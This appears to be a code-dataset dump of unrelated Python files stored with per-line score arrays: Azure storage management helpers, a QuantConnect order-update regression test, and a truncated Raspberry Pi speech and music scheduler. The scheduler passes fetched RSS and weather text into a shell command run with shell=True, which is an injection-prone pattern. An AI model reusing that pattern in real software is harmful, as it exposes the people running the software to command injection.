custom_fields.discard(skip_field) return custom_fields def unregister_provider(subscription_id, creds, provider_namespace): resource_client = ResourceManagementClient(creds, subscription_id) resource_client.providers.unregister(provider_namespace) def register_provider(subscription_id, creds, provider_namespace): resource_client = ResourceManagementClient(creds, subscription_id) resource_client.providers.register(provider_namespace) def create_storage_account(subscription_id, creds, resource_group_name, account_name, location, type): storage_client = StorageManagementClient(creds, subscription_id) result = storage_client.storage_accounts.create( resource_group_name, account_name, StorageAccountCreateParameters( location=location, account_type=type, ), raw=True ) return result.response def delete_storage_account(subscription_id, creds, resource_group_name, account_name): storage_client = StorageManagementClient(creds, subscription_id) result = storage_client.storage_accounts.delete( resource_group_name, account_name, ) return result def get_create_storage_account_status(subscription_id, creds, link): storage_client = StorageManagementClient(creds, subscription_id) request = storage_client._client.get(link) result = storage_client._client.send(request) return result
[ "#-------------------------------------------------------------------------\n", "# Copyright (c) Microsoft. All rights reserved.\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at\n", "# http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "#--------------------------------------------------------------------------\n", "from datetime import datetime, timedelta\n", "from base64 import b64decode\n", "\n", "from azure.mgmt.resource.resources import (\n", " ResourceManagementClient,\n", ")\n", "from azure.mgmt.resource.subscriptions import (\n", " SubscriptionClient,\n", ")\n", "from azure.mgmt.storage import (\n", " StorageManagementClient,\n", ")\n", "from azure.mgmt.storage.models import (\n", " StorageAccountCreateParameters,\n", ")\n", "from azure.mgmt.compute import (\n", " ComputeManagementClient,\n", ")\n", "from azure.mgmt.network import (\n", " NetworkManagementClient,\n", ")\n", "\n", "from azure.storage import AccessPolicy, CloudStorageAccount, SharedAccessPolicy\n", "from azure.storage.blob import BlobService, BlobSharedAccessPermissions\n", "from azure.storage.file import FileService\n", "from azure.storage.queue import QueueService\n", "from azure.storage.table import TableService\n", "\n", "from . import storage_extensions\n", "\n", "# Add some extensions to the service classes\n", "# This functionality will eventually be part of the SDK\n", "FileService.iterate_shares = storage_extensions.iterate_shares\n", "BlobService.iterate_containers = storage_extensions.iterate_containers\n", "BlobService.iterate_blobs = storage_extensions.iterate_blobs\n", "QueueService.iterate_queues = storage_extensions.iterate_queues\n", "TableService.iterate_tables = storage_extensions.iterate_tables\n", "\n", "\n", "class AccountDetails(object):\n", " def __init__(self, subscriptions=None, tenants=None):\n", " self.subscriptions = subscriptions\n", " self.tenants = tenants\n", "\n", "class SubscriptionDetails(object):\n", " def __init__(self, resource_groups=None, providers=None):\n", " self.resource_groups = resource_groups\n", " self.providers = providers\n", "\n", "class ResourceGroupDetails(object):\n", " def __init__(self, storage_accounts=None, storage_accounts_locations=None,\n", " vms=None, public_ip_addresses=None, virtual_networks=None):\n", " self.storage_accounts = storage_accounts\n", " self.storage_accounts_locations = storage_accounts_locations\n", " self.vms = vms\n", " self.public_ip_addresses = public_ip_addresses\n", " self.virtual_networks = virtual_networks\n", "\n", "class StorageAccountDetails(object):\n", " def __init__(self, account_props=None, account_keys=None,\n", " blob_containers=None, shares=None, tables=None, queues=None,\n", " blob_service_properties=None, queue_service_properties=None,\n", " table_service_properties=None):\n", " self.account_props = account_props\n", " self.account_keys = account_keys\n", " self.blob_containers = blob_containers\n", " self.shares = shares\n", " self.tables = tables\n", " self.queues = queues\n", " self.blob_service_properties = blob_service_properties\n", " self.queue_service_properties = queue_service_properties\n", " self.table_service_properties = table_service_properties\n", "\n", "class StorageAccountContainerDetails(object):\n", " def __init__(self, container_name=None, sas_policy=None, blobs=None):\n", " self.container_name = container_name\n", " self.sas_policy = sas_policy\n", " self.blobs = blobs\n", "\n", "class StorageAccountQueueDetails(object):\n", " def __init__(self, queue_name=None, metadata=None, messages=None):\n", " self.queue_name = queue_name\n", " self.metadata = metadata\n", " self.messages = messages\n", "\n", "class StorageAccountTableDetails(object):\n", " def __init__(self, table_name=None, entities=None, custom_fields=None):\n", " self.table_name = table_name\n", " self.entities = entities\n", " self.custom_fields = custom_fields\n", "\n", "class VMDetails(object):\n", " def __init__(self, name=None, vm=None):\n", " self.name = name\n", " self.vm = vm\n", "\n", "class VirtualNetworkDetails(object):\n", " def __init__(self, name=None, network=None):\n", " self.name = name\n", " self.network = network\n", "\n", "\n", "def get_account_details(creds):\n", " subscription_client = SubscriptionClient(creds)\n", "\n", " model = AccountDetails()\n", " model.subscriptions = list(subscription_client.subscriptions.list())\n", " model.tenants = list(subscription_client.tenants.list())\n", " return model\n", "\n", "def get_subscription_details(subscription_id, creds):\n", " resource_client = ResourceManagementClient(creds, subscription_id)\n", "\n", " model = SubscriptionDetails()\n", " model.resource_groups = list(resource_client.resource_groups.list())\n", " model.providers = list(resource_client.providers.list())\n", "\n", " return model\n", "\n", "def get_resource_group_details(subscription_id, creds, resource_group_name):\n", " storage_client = StorageManagementClient(creds, subscription_id)\n", " resource_client = ResourceManagementClient(creds, subscription_id)\n", " compute_client = ComputeManagementClient(creds, subscription_id)\n", " network_client = NetworkManagementClient(creds, subscription_id)\n", "\n", " model = ResourceGroupDetails()\n", " model.storage_accounts = list(storage_client.storage_accounts.list_by_resource_group(resource_group_name))\n", " provider = resource_client.providers.get('Microsoft.Storage')\n", " resource_type = [r for r in provider.resource_types if r.resource_type == 'storageAccounts'][0]\n", " model.storage_accounts_locations = resource_type.locations\n", "\n", " # TODO: make an iterate function\n", " model.vms = list(compute_client.virtual_machines.list(resource_group_name))\n", " model.public_ip_addresses = list(network_client.public_ip_addresses.list(resource_group_name))\n", " model.virtual_networks = list(network_client.virtual_networks.list(resource_group_name))\n", "\n", " return model\n", "\n", "def get_vm_details(subscription_id, creds, resource_group_name, vm_name):\n", " compute_client = ComputeManagementClient(creds, subscription_id)\n", "\n", " model = VMDetails(\n", " name=vm_name,\n", " vm=compute_client.virtual_machines.get(resource_group_name, vm_name),\n", " )\n", " return model\n", "\n", "def get_virtual_network_details(subscription_id, creds, resource_group_name, network_name):\n", " network_client = NetworkManagementClient(creds, subscription_id)\n", "\n", " model = VirtualNetworkDetails(\n", " name=network_name,\n", " network=network_client.virtual_networks.get(resource_group_name, network_name),\n", " )\n", " return model\n", "\n", "def get_storage_account_details(subscription_id, creds, resource_group_name, account_name):\n", " storage_client = StorageManagementClient(creds, subscription_id)\n", " account_result = storage_client.storage_accounts.get_properties(\n", " resource_group_name,\n", " account_name,\n", " )\n", " storage_account_keys = storage_client.storage_accounts.list_keys(\n", " resource_group_name,\n", " account_name,\n", " )\n", " account_key = storage_account_keys.key1\n", "\n", " account = CloudStorageAccount(account_name, account_key)\n", " blob_service = account.create_blob_service()\n", " file_service = account.create_file_service()\n", " queue_service = account.create_queue_service()\n", " table_service = account.create_table_service()\n", "\n", " model = StorageAccountDetails()\n", " model.account_props = account_result\n", " model.account_keys = storage_account_keys\n", " model.blob_containers = blob_service.iterate_containers()\n", " model.queues = queue_service.iterate_queues()\n", " #TODO: find out why listing shares doesn't work\n", " #model.shares = file_service.iterate_shares()\n", " model.shares = []\n", " model.tables = table_service.iterate_tables()\n", " model.blob_service_properties = blob_service.get_blob_service_properties()\n", " model.queue_service_properties = queue_service.get_queue_service_properties()\n", " model.table_service_properties = table_service.get_table_service_properties()\n", "\n", " return model\n", "\n", "def _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name):\n", " storage_client = StorageManagementClient(creds, subscription_id)\n", " storage_account_keys = storage_client.storage_accounts.list_keys(\n", " resource_group_name,\n", " account_name,\n", " )\n", " return storage_account_keys\n", "\n", "def get_container_details(subscription_id, creds, resource_group_name, account_name, container_name):\n", " keys = _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name)\n", " blob_service = BlobService(account_name, keys.key1)\n", "\n", " model = StorageAccountContainerDetails()\n", " model.container_name = container_name\n", " model.sas_policy = _get_shared_access_policy(BlobSharedAccessPermissions.READ)\n", " model.blobs = []\n", " for blob in blob_service.iterate_blobs(container_name, include='metadata'):\n", " sas_token = blob_service.generate_shared_access_signature(container_name, blob.name, model.sas_policy)\n", " blob.sas_url = blob_service.make_blob_url(container_name, blob.name, sas_token=sas_token)\n", " raw_md5 = b64decode(blob.properties.content_md5)\n", " hex_md5 = ''.join([hex(val)[2:] for val in raw_md5])\n", " blob.properties.content_hex_md5 = hex_md5\n", " model.blobs.append(blob)\n", "\n", " return model\n", "\n", "def _get_shared_access_policy(permission):\n", " date_format = \"%Y-%m-%dT%H:%M:%SZ\"\n", " start = datetime.utcnow() - timedelta(minutes=1)\n", " expiry = start + timedelta(hours=1)\n", " return SharedAccessPolicy(\n", " AccessPolicy(\n", " start.strftime(date_format),\n", " expiry.strftime(date_format),\n", " permission,\n", " )\n", " )\n", "\n", "def get_queue_details(subscription_id, creds, resource_group_name, account_name, queue_name):\n", " keys = _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name)\n", " queue_service = QueueService(account_name, keys.key1)\n", "\n", " model = StorageAccountQueueDetails()\n", " model.queue_name = queue_name\n", " model.metadata = queue_service.get_queue_metadata(queue_name)\n", " count = int(model.metadata.get('x-ms-approximate-messages-count', '0'))\n", " model.messages = queue_service.peek_messages(queue_name, count) if count else []\n", " for msg in model.messages:\n", " try:\n", " msg.decoded_text = b64decode(msg.message_text).decode()\n", " except:\n", " msg.decoded_text = None\n", "\n", " return model\n", "\n", "def get_table_details(subscription_id, creds, resource_group_name, account_name, table_name, next_partition_key=None, next_row_key=None):\n", " keys = _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name)\n", " table_service = TableService(account_name, keys.key1)\n", "\n", " model = StorageAccountTableDetails()\n", " model.table_name = table_name\n", " model.entities = table_service.query_entities(\n", " table_name,\n", " top=3, # small to demonstrate continuations\n", " next_partition_key=next_partition_key,\n", " next_row_key=next_row_key,\n", " )\n", " model.custom_fields = _get_entities_custom_fields(model.entities)\n", "\n", " return model\n", "\n", "def _get_entities_custom_fields(entities):\n", " '''Get the union of all custom fields in the specified entities.'''\n", " custom_fields = set()\n", " for entity in entities:\n", " fields = dir(entity)\n", " for field in fields:\n", " if not field.startswith('_'):\n", " custom_fields.add(field)\n", " for skip_field in ['PartitionKey', 'RowKey', 'Timestamp', 'etag']:\n", " custom_fields.discard(skip_field)\n", " return custom_fields\n", "\n", "def unregister_provider(subscription_id, creds, provider_namespace):\n", " resource_client = ResourceManagementClient(creds, subscription_id)\n", " resource_client.providers.unregister(provider_namespace)\n", "\n", "def register_provider(subscription_id, creds, provider_namespace):\n", " resource_client = ResourceManagementClient(creds, subscription_id)\n", " resource_client.providers.register(provider_namespace)\n", "\n", "def create_storage_account(subscription_id, creds, resource_group_name, account_name, location, type):\n", " storage_client = StorageManagementClient(creds, subscription_id)\n", " result = storage_client.storage_accounts.create(\n", " resource_group_name,\n", " account_name,\n", " StorageAccountCreateParameters(\n", " location=location,\n", " account_type=type,\n", " ),\n", " raw=True\n", " )\n", " return result.response\n", "\n", "def delete_storage_account(subscription_id, creds, resource_group_name, account_name):\n", " storage_client = StorageManagementClient(creds, subscription_id)\n", " result = storage_client.storage_accounts.delete(\n", " resource_group_name,\n", " account_name,\n", " )\n", " return result\n", "\n", "def get_create_storage_account_status(subscription_id, creds, link):\n", " storage_client = StorageManagementClient(creds, subscription_id)\n", " request = storage_client._client.get(link)\n", " result = storage_client._client.send(request)\n", " return result\n" ]
[ 0.013333333333333334, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.013157894736842105, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02857142857142857, 0, 0, 0, 0, 0.027777777777777776, 0, 0, 0, 0, 0, 0, 0, 0, 0.02702702702702703, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.021739130434782608, 0, 0, 0, 0, 0, 0.023809523809523808, 0, 0, 0, 0, 0, 0.023809523809523808, 0, 0, 0, 0, 0, 0.04, 0, 0, 0, 0, 0.02702702702702703, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.018518518518518517, 0, 0, 0, 0, 0, 0, 0, 0, 0.012987012987012988, 0, 0, 0, 0, 0, 0, 0.009009009009009009, 0, 0.01, 0, 0, 0, 0, 0.010101010101010102, 0.010752688172043012, 0, 0, 0, 0.013513513513513514, 0, 0, 0, 0, 0, 0, 0, 0, 0.021739130434782608, 0, 0, 0, 0, 0.011363636363636364, 0, 0, 0, 0.021739130434782608, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0.02, 0, 0, 0, 0.012195121951219513, 0.012195121951219513, 0, 0, 0, 0.022222222222222223, 0, 0, 0, 0, 0, 0, 0, 0.0196078431372549, 0.010416666666666666, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0.009009009009009009, 0.01020408163265306, 0, 0, 0, 0, 0, 0, 0, 0.023255813953488372, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02127659574468085, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0.014492753623188406, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0, 0, 0, 0, 0, 0.023255813953488372, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.014492753623188406, 0, 0, 0, 0.014925373134328358, 0, 0, 0, 0.019417475728155338, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.022988505747126436, 0, 0, 0, 0, 0, 0, 0, 0.014492753623188406, 0, 0, 0, 0 ]
320
0.00255
false
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals. # Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from clr import AddReference AddReference("System.Core") AddReference("System.Collections") AddReference("QuantConnect.Algorithm") AddReference("QuantConnect.Common") from System import * from System.Linq import * from QuantConnect import * from QuantConnect.Algorithm import * from QuantConnect.Data import * from QuantConnect.Orders import * from QuantConnect.Securities import * from QuantConnect.Util import * from math import copysign from datetime import datetime ### <summary> ### Provides a regression baseline focused on updating orders ### </summary> ### <meta name="tag" content="regression test" /> class UpdateOrderRegressionAlgorithm(QCAlgorithm): def Initialize(self): '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.''' self.SetStartDate(2013,1,1) #Set Start Date self.SetEndDate(2015,1,1) #Set End Date self.SetCash(100000) #Set Strategy Cash # Find more symbols here: http://quantconnect.com/data self.security = self.AddEquity("SPY", Resolution.Daily) self.last_month = -1 self.quantity = 100 self.delta_quantity = 10 self.stop_percentage = 0.025 self.stop_percentage_delta = 0.005 self.limit_percentage = 0.025 self.limit_percentage_delta = 0.005 OrderTypeEnum = [OrderType.Market, OrderType.Limit, OrderType.StopMarket, OrderType.StopLimit, OrderType.MarketOnOpen, OrderType.MarketOnClose] self.order_types_queue = CircularQueue[OrderType](OrderTypeEnum) self.order_types_queue.CircleCompleted += self.onCircleCompleted self.tickets = [] def onCircleCompleted(self, sender, event): '''Flip our signs when we've gone through all the order types''' self.quantity *= -1 def OnData(self, data): '''OnData event is the primary entry point for your algorithm. Each new data point will be pumped in here.''' if not data.ContainsKey("SPY"): return if self.Time.month != self.last_month: # we'll submit the next type of order from the queue orderType = self.order_types_queue.Dequeue() #Log("") self.Log("\r\n--------------MONTH: {0}:: {1}\r\n".format(self.Time.strftime("%B"), orderType)) #Log("") self.last_month = self.Time.month self.Log("ORDER TYPE:: {0}".format(orderType)) isLong = self.quantity > 0 stopPrice = (1 + self.stop_percentage)*data["SPY"].High if isLong else (1 - self.stop_percentage)*data["SPY"].Low limitPrice = (1 - self.limit_percentage)*stopPrice if isLong else (1 + self.limit_percentage)*stopPrice if orderType == OrderType.Limit: limitPrice = (1 + self.limit_percentage)*data["SPY"].High if not isLong else (1 - self.limit_percentage)*data["SPY"].Low request = SubmitOrderRequest(orderType, self.security.Symbol.SecurityType, "SPY", self.quantity, stopPrice, limitPrice, self.UtcTime, str(orderType)) ticket = self.Transactions.AddOrder(request) self.tickets.append(ticket) elif len(self.tickets) > 0: ticket = self.tickets[-1] if self.Time.day > 8 and self.Time.day < 14: if len(ticket.UpdateRequests) == 0 and ticket.Status is not OrderStatus.Filled: self.Log("TICKET:: {0}".format(ticket)) updateOrderFields = UpdateOrderFields() updateOrderFields.Quantity = ticket.Quantity + copysign(self.delta_quantity, self.quantity) updateOrderFields.Tag = "Change quantity: {0}".format(self.Time.day) ticket.Update(updateOrderFields) elif self.Time.day > 13 and self.Time.day < 20: if len(ticket.UpdateRequests) == 1 and ticket.Status is not OrderStatus.Filled: self.Log("TICKET:: {0}".format(ticket)) updateOrderFields = UpdateOrderFields() updateOrderFields.LimitPrice = self.security.Price*(1 - copysign(self.limit_percentage_delta, ticket.Quantity)) updateOrderFields.StopPrice = self.security.Price*(1 + copysign(self.stop_percentage_delta, ticket.Quantity)) updateOrderFields.Tag = "Change prices: {0}".format(self.Time.day) ticket.Update(updateOrderFields) else: if len(ticket.UpdateRequests) == 2 and ticket.Status is not OrderStatus.Filled: self.Log("TICKET:: {0}".format(ticket)) ticket.Cancel("{0} and is still open!".format(self.Time.day)) self.Log("CANCELLED:: {0}".format(ticket.CancelRequest)) def OnOrderEvent(self, orderEvent): order = self.Transactions.GetOrderById(orderEvent.OrderId) ticket = self.Transactions.GetOrderTicket(orderEvent.OrderId) #order cancelations update CanceledTime if order.Status == OrderStatus.Canceled and order.CanceledTime != orderEvent.UtcTime: raise ValueError("Expected canceled order CanceledTime to equal canceled order event time.") #fills update LastFillTime if (order.Status == OrderStatus.Filled or order.Status == OrderStatus.PartiallyFilled) and order.LastFillTime != orderEvent.UtcTime: raise ValueError("Expected filled order LastFillTime to equal fill order event time.") # check the ticket to see if the update was successfully processed if len([ur for ur in ticket.UpdateRequests if ur.Response is not None and ur.Response.IsSuccess]) > 0 and order.CreatedTime != self.UtcTime and order.LastUpdateTime is None: raise ValueError("Expected updated order LastUpdateTime to equal submitted update order event time") if orderEvent.Status == OrderStatus.Filled: self.Log("FILLED:: {0} FILL PRICE:: {1}".format(self.Transactions.GetOrderById(orderEvent.OrderId), orderEvent.FillPrice)) else: self.Log(orderEvent.ToString()) self.Log("TICKET:: {0}".format(ticket))
[ "# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.\n", "# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "\n", "from clr import AddReference\n", "AddReference(\"System.Core\")\n", "AddReference(\"System.Collections\")\n", "AddReference(\"QuantConnect.Algorithm\")\n", "AddReference(\"QuantConnect.Common\")\n", "\n", "from System import *\n", "from System.Linq import *\n", "from QuantConnect import *\n", "from QuantConnect.Algorithm import *\n", "from QuantConnect.Data import *\n", "from QuantConnect.Orders import *\n", "from QuantConnect.Securities import *\n", "from QuantConnect.Util import *\n", "from math import copysign\n", "from datetime import datetime\n", "\n", "### <summary>\n", "### Provides a regression baseline focused on updating orders\n", "### </summary>\n", "### <meta name=\"tag\" content=\"regression test\" />\n", "class UpdateOrderRegressionAlgorithm(QCAlgorithm):\n", "\n", " def Initialize(self):\n", " '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.'''\n", "\n", " self.SetStartDate(2013,1,1) #Set Start Date\n", " self.SetEndDate(2015,1,1) #Set End Date\n", " self.SetCash(100000) #Set Strategy Cash\n", " # Find more symbols here: http://quantconnect.com/data\n", "\n", " self.security = self.AddEquity(\"SPY\", Resolution.Daily)\n", "\n", " self.last_month = -1\n", " self.quantity = 100\n", " self.delta_quantity = 10\n", "\n", " self.stop_percentage = 0.025\n", " self.stop_percentage_delta = 0.005\n", " self.limit_percentage = 0.025\n", " self.limit_percentage_delta = 0.005\n", "\n", " OrderTypeEnum = [OrderType.Market, OrderType.Limit, OrderType.StopMarket, OrderType.StopLimit, OrderType.MarketOnOpen, OrderType.MarketOnClose]\n", " self.order_types_queue = CircularQueue[OrderType](OrderTypeEnum)\n", " self.order_types_queue.CircleCompleted += self.onCircleCompleted\n", " self.tickets = []\n", "\n", "\n", " def onCircleCompleted(self, sender, event):\n", " '''Flip our signs when we've gone through all the order types'''\n", " self.quantity *= -1\n", "\n", "\n", " def OnData(self, data):\n", " '''OnData event is the primary entry point for your algorithm. Each new data point will be pumped in here.'''\n", " if not data.ContainsKey(\"SPY\"):\n", " return\n", "\n", " if self.Time.month != self.last_month:\n", " # we'll submit the next type of order from the queue\n", " orderType = self.order_types_queue.Dequeue()\n", " #Log(\"\")\n", " self.Log(\"\\r\\n--------------MONTH: {0}:: {1}\\r\\n\".format(self.Time.strftime(\"%B\"), orderType))\n", " #Log(\"\")\n", " self.last_month = self.Time.month\n", " self.Log(\"ORDER TYPE:: {0}\".format(orderType))\n", " isLong = self.quantity > 0\n", " stopPrice = (1 + self.stop_percentage)*data[\"SPY\"].High if isLong else (1 - self.stop_percentage)*data[\"SPY\"].Low\n", " limitPrice = (1 - self.limit_percentage)*stopPrice if isLong else (1 + self.limit_percentage)*stopPrice\n", "\n", " if orderType == OrderType.Limit:\n", " limitPrice = (1 + self.limit_percentage)*data[\"SPY\"].High if not isLong else (1 - self.limit_percentage)*data[\"SPY\"].Low\n", "\n", " request = SubmitOrderRequest(orderType, self.security.Symbol.SecurityType, \"SPY\", self.quantity, stopPrice, limitPrice, self.UtcTime, str(orderType))\n", " ticket = self.Transactions.AddOrder(request)\n", " self.tickets.append(ticket)\n", "\n", " elif len(self.tickets) > 0:\n", " ticket = self.tickets[-1]\n", "\n", " if self.Time.day > 8 and self.Time.day < 14:\n", " if len(ticket.UpdateRequests) == 0 and ticket.Status is not OrderStatus.Filled:\n", " self.Log(\"TICKET:: {0}\".format(ticket))\n", " updateOrderFields = UpdateOrderFields()\n", " updateOrderFields.Quantity = ticket.Quantity + copysign(self.delta_quantity, self.quantity)\n", " updateOrderFields.Tag = \"Change quantity: {0}\".format(self.Time.day)\n", " ticket.Update(updateOrderFields)\n", "\n", " elif self.Time.day > 13 and self.Time.day < 20:\n", " if len(ticket.UpdateRequests) == 1 and ticket.Status is not OrderStatus.Filled:\n", " self.Log(\"TICKET:: {0}\".format(ticket))\n", " updateOrderFields = UpdateOrderFields()\n", " updateOrderFields.LimitPrice = self.security.Price*(1 - copysign(self.limit_percentage_delta, ticket.Quantity))\n", " updateOrderFields.StopPrice = self.security.Price*(1 + copysign(self.stop_percentage_delta, ticket.Quantity))\n", " updateOrderFields.Tag = \"Change prices: {0}\".format(self.Time.day)\n", " ticket.Update(updateOrderFields)\n", " else:\n", " if len(ticket.UpdateRequests) == 2 and ticket.Status is not OrderStatus.Filled:\n", " self.Log(\"TICKET:: {0}\".format(ticket))\n", " ticket.Cancel(\"{0} and is still open!\".format(self.Time.day))\n", " self.Log(\"CANCELLED:: {0}\".format(ticket.CancelRequest))\n", "\n", "\n", " def OnOrderEvent(self, orderEvent):\n", " order = self.Transactions.GetOrderById(orderEvent.OrderId)\n", " ticket = self.Transactions.GetOrderTicket(orderEvent.OrderId)\n", "\n", " #order cancelations update CanceledTime\n", " if order.Status == OrderStatus.Canceled and order.CanceledTime != orderEvent.UtcTime:\n", " raise ValueError(\"Expected canceled order CanceledTime to equal canceled order event time.\")\n", "\n", " #fills update LastFillTime\n", " if (order.Status == OrderStatus.Filled or order.Status == OrderStatus.PartiallyFilled) and order.LastFillTime != orderEvent.UtcTime:\n", " raise ValueError(\"Expected filled order LastFillTime to equal fill order event time.\")\n", "\n", " # check the ticket to see if the update was successfully processed\n", " if len([ur for ur in ticket.UpdateRequests if ur.Response is not None and ur.Response.IsSuccess]) > 0 and order.CreatedTime != self.UtcTime and order.LastUpdateTime is None:\n", " raise ValueError(\"Expected updated order LastUpdateTime to equal submitted update order event time\")\n", "\n", " if orderEvent.Status == OrderStatus.Filled:\n", " self.Log(\"FILLED:: {0} FILL PRICE:: {1}\".format(self.Transactions.GetOrderById(orderEvent.OrderId), orderEvent.FillPrice))\n", " else:\n", " self.Log(orderEvent.ToString())\n", " self.Log(\"TICKET:: {0}\".format(ticket))" ]
[ 0, 0.012345679012345678, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.038461538461538464, 0.037037037037037035, 0.02702702702702703, 0.03125, 0.029411764705882353, 0.02631578947368421, 0.03125, 0.038461538461538464, 0.03333333333333333, 0, 0.07142857142857142, 0.016129032258064516, 0.06666666666666667, 0.02, 0.0196078431372549, 0, 0, 0.006578947368421052, 0, 0.05454545454545454, 0.05660377358490566, 0.017241379310344827, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.006578947368421052, 0, 0, 0, 0, 0, 0.020833333333333332, 0, 0, 0, 0, 0.03571428571428571, 0.00847457627118644, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.009345794392523364, 0.047619047619047616, 0, 0, 0, 0.007936507936507936, 0.008620689655172414, 0, 0, 0.0072992700729927005, 0, 0.006172839506172839, 0, 0, 0, 0, 0, 0, 0, 0.010416666666666666, 0, 0, 0.008928571428571428, 0.011235955056179775, 0, 0, 0, 0.010416666666666666, 0, 0, 0.007575757575757576, 0.007692307692307693, 0.011494252873563218, 0, 0, 0.010416666666666666, 0, 0.012195121951219513, 0, 0, 0, 0.025, 0, 0, 0, 0.020833333333333332, 0.010638297872340425, 0.009523809523809525, 0, 0.02857142857142857, 0.0070921985815602835, 0.010101010101010102, 0, 0, 0.005494505494505495, 0.008849557522123894, 0, 0, 0.007407407407407408, 0, 0, 0.0196078431372549 ]
137
0.008341
false
#!/usr/bin/python # -*- coding: utf-8 -*- import logging import smbus import time as timec import datetime from datetime import datetime as datetimec import json import urllib import pprint import sys import subprocess import requests import feedparser import ap_music_server_conf import ap_music class Yukkuri: def __init__(self): self.conf = ap_music_server_conf.MusicServerConfig().get_conf() return def send_cmmand(self,cmd): p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout_data, stderr_data = p.communicate() return stdout_data def speech(self,text): cmd = self.conf['speech_api'] % text logging.debug(cmd) self.send_cmmand(cmd) def dayofweek_info_speech(self): weekday = datetime.datetime.now().weekday() for d in self.conf['dayofweek_info']: if d == str(weekday): self.speech(self.conf['dayofweek_info'][d]) def wether_speech(self): url = 'http://weather.livedoor.com/forecast/webservice/json/v1' payload = { 'city' : self.conf['city_id'] } data = requests.get(url, params = payload).json() text="" try: title = data['title']+u'をお伝えします。' text = title for weather in data["forecasts"]: date = weather['date'] d = date.encode().split("-") text += str(int(d[1])) +u"月"+ str(int(d[2]))+ u'日、' + weather['dateLabel'] + u'は' + weather['telop'] + u'です。' d = data["forecasts"][0]['date'].encode().split("-") max = data["forecasts"][0]['temperature']['max']['celsius'] text += u'今日、'+str(int(d[1])) +u"月"+ str(int(d[2]))+ u'日、の最高気温は、%s 度です。' % max min = data["forecasts"][0]['temperature']['min']['celsius'] text += u'最低気温は、%s 度です。' % min except TypeError: print("No temp in data") self.speech(text) def rss_speech(self,rss_url): feed = feedparser.parse(rss_url) for e in feed.entries: self.speech( e.title ) def play_welcome_msg(self): self.speech(self.conf['welcome_msg']) class Schedule: def __init__(self,motion_obj,timer_obj): self.conf = ap_music_server_conf.MusicServerConfig().get_conf() envfile = open(self.conf['schedule_file_path'], 'r') self.data = json.load(envfile) envfile.close() self.timer = timer_obj self.motion = motion_obj self.yukkuri = Yukkuri() self.music = ap_music.ApMusic() return def check_ex(self,timing): if timing.get('excond')=='movement': #if movement is active: print("excond",self.motion.get_latest_status()) if self.motion.get_latest_status() > 2: return True return False #movement is not set return True def check_power_control(self,entry): if entry['status']=='done': return if entry['action']=='shutdown': logging.debug("**************************") logging.debug("*** shutdown RasPi now ***") logging.debug("**************************") self.timer.send_shutdown_request() entry['status']='done' return return def check_speech_control(self,entry): if entry['action'] == "speech": self.yukkuri.speech(entry['content']) elif entry['action'] == "speech_weather": self.yukkuri.wether_speech() return def check_music_control(self,entry): if entry['action'] == "play": self.music.play_item(entry['content']) elif entry['action'] == "stop": self.music.stop() return def check_basic_timer(self,timing,now,target): t1 = ArduinoTimer.datetime_to_epoch(now) t2 = ArduinoTimer.datetime_to_epoch(target) if t1 > t2: if abs(t1-t2) < 60*1: #allow 60sec diff return self.check_ex(timing) else: if timing.get('excond')=='movement' and abs(t1-t2) < 60*60*3: return False return "done" return False def judge_timing(self,timing): now = 